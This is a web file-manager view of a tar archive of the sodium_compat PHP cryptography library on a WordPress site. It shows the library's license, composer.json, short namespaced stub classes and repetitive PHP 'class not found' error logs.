Файловый менеджер - Редактировать - /home/barghamad/public_html/wp-includes/widgets/sodium_compat.tar
Назад
LICENSE 0000644 00000001534 15057664256 0005574 0 ustar 00 ISC License Copyright (c) 2016-2021, Paragon Initiative Enterprises <security at paragonie dot com> Copyright (c) 2013-2019, Frank Denis <j at pureftpd dot org> Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. composer.json 0000644 00000003110 15057664256 0007301 0 ustar 00 { "name": "paragonie/sodium_compat", "description": "Pure PHP implementation of libsodium; uses the PHP extension if it exists", "keywords": [ "PHP", "cryptography", "elliptic curve", "elliptic curve cryptography", "Pure-PHP cryptography", "side-channel resistant", "Curve25519", "X25519", "ECDH", "Elliptic Curve Diffie-Hellman", "Ed25519", "RFC 7748", "RFC 8032", "EdDSA", "Edwards-curve Digital Signature Algorithm", "ChaCha20", "Salsa20", "Xchacha20", "Xsalsa20", "Poly1305", "BLAKE2b", "public-key cryptography", "secret-key cryptography", "AEAD", "Chapoly", "Salpoly", "ChaCha20-Poly1305", "XSalsa20-Poly1305", "XChaCha20-Poly1305", "encryption", "authentication", "libsodium" ], "license": "ISC", "authors": [ { "name": "Paragon Initiative Enterprises", "email": "security@paragonie.com" }, { "name": "Frank Denis", "email": "jedisct1@pureftpd.org" } ], "autoload": { "files": ["autoload.php"] }, "require": { "php": "^5.2.4|^5.3|^5.4|^5.5|^5.6|^7|^8", "paragonie/random_compat": ">=1" }, "require-dev": { "phpunit/phpunit": "^3|^4|^5|^6|^7|^8|^9" }, "scripts": { "test": "phpunit" }, "suggest": { "ext-libsodium": "PHP < 7.0: Better performance, password hashing (Argon2i), secure memory management (memzero), and better security.", "ext-sodium": "PHP >= 7.0: Better performance, password hashing (Argon2i), secure memory management (memzero), and better security." } } namespaced/Crypto.php 0000644 00000000126 15057664256 0010654 0 ustar 00 <?php namespace ParagonIE\Sodium; class Crypto extends \ParagonIE_Sodium_Crypto { } namespaced/File.php 0000644 00000000122 15057664256 0010247 0 ustar 00 <?php namespace ParagonIE\Sodium; class File extends \ParagonIE_Sodium_File { } namespaced/Compat.php 0000644 00000000126 15057664256 0010617 0 ustar 00 <?php namespace ParagonIE\Sodium; class Compat extends \ParagonIE_Sodium_Compat { } namespaced/error_log 0000644 00000043346 15057664256 0010613 0 ustar 00 [06-Aug-2021 05:49:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [06-Aug-2021 05:49:26 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [06-Aug-2021 05:49:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [06-Aug-2021 05:50:32 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [06-Aug-2021 12:56:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [06-Aug-2021 12:56:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [06-Aug-2021 20:04:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [06-Aug-2021 20:09:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [07-Aug-2021 00:58:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [07-Aug-2021 01:02:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [07-Aug-2021 05:46:28 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [07-Aug-2021 05:51:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [07-Aug-2021 10:47:06 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [07-Aug-2021 10:52:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [09-Aug-2021 07:13:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [09-Aug-2021 10:21:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [09-Aug-2021 19:50:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [10-Aug-2021 01:45:02 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [10-Aug-2021 07:04:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [06-Oct-2021 04:51:49 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [06-Oct-2021 10:22:43 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [15-Oct-2021 12:15:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [17-Oct-2021 04:04:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [18-Oct-2021 05:24:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [22-Oct-2021 17:48:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [23-Oct-2021 09:25:02 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [25-Oct-2021 06:09:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [03-Nov-2021 01:36:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [15-Nov-2021 22:57:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [23-Nov-2021 18:36:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [24-Nov-2021 12:34:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [07-Dec-2021 06:37:49 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [26-Dec-2021 00:59:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Crypto' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Crypto.php on line 4 [24-Feb-2022 00:17:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [29-Mar-2022 18:03:29 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [11-Apr-2022 23:28:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [02-Jun-2022 19:48:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [07-Jul-2022 00:57:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [11-Jul-2022 14:19:26 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [12-Sep-2022 19:13:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [28-Sep-2022 16:28:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [15-Oct-2022 06:08:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [23-Oct-2022 12:56:43 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [29-Oct-2022 04:11:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [13-Nov-2022 11:36:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [21-Nov-2022 19:58:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [27-Nov-2022 03:02:27 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [08-Dec-2022 04:45:05 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [01-Jan-2023 07:41:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [25-Jan-2023 22:37:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [06-Feb-2023 00:01:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [24-Feb-2023 07:42:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [23-Mar-2023 15:12:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [11-Apr-2023 14:59:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [11-Jul-2023 03:52:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [20-Jul-2023 01:56:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [31-Jul-2023 04:26:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [03-Aug-2023 01:19:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 [16-Aug-2023 12:12:56 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Compat' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Compat.php on line 4 [19-Aug-2023 15:48:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_File' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/File.php on line 4 namespaced/Core/Curve25519.php 0000644 00000000150 15057664256 0011753 0 ustar 00 <?php namespace ParagonIE\Sodium\Core; class Curve25519 extends \ParagonIE_Sodium_Core_Curve25519 { } namespaced/Core/Curve25519/Ge/Cached.php 0000644 00000000174 15057664256 0013463 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519\Ge; class Cached extends \ParagonIE_Sodium_Core_Curve25519_Ge_Cached { } namespaced/Core/Curve25519/Ge/Precomp.php 0000644 00000000176 15057664256 0013723 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519\Ge; class Precomp extends \ParagonIE_Sodium_Core_Curve25519_Ge_Precomp { } namespaced/Core/Curve25519/Ge/P3.php 0000644 00000000164 15057664256 0012575 0 ustar 00 <?php namespace ParagonIE\Sodium\Core\Curve25519\Ge; class P3 extends \ParagonIE_Sodium_Core_Curve25519_Ge_P3 { } namespaced/Core/Curve25519/Ge/error_log 0000644 00000047042 15057664256 0013525 0 ustar 00 [07-Aug-2021 10:23:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [07-Aug-2021 20:44:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [07-Aug-2021 21:19:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P2' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php on line 4 [08-Aug-2021 04:29:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [09-Aug-2021 00:17:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [08-Oct-2021 00:41:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P2' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php on line 4 [08-Oct-2021 02:11:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [08-Oct-2021 04:26:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [28-Jan-2022 11:55:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [28-Jan-2022 12:13:45 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [20-Mar-2022 21:29:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [13-Apr-2022 08:56:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [11-May-2022 15:40:37 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [12-Jun-2022 19:43:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 [13-Jun-2022 01:05:48 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Precomp' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php on line 4 [06-Jul-2022 02:29:40 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [13-Jul-2022 01:23:38 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P1p1' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php on line 4 [21-Jul-2022 19:18:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [06-Aug-2022 14:48:52 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_P3' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php on line 4 [19-Aug-2022 20:55:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519_Ge_Cached' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php on line 4 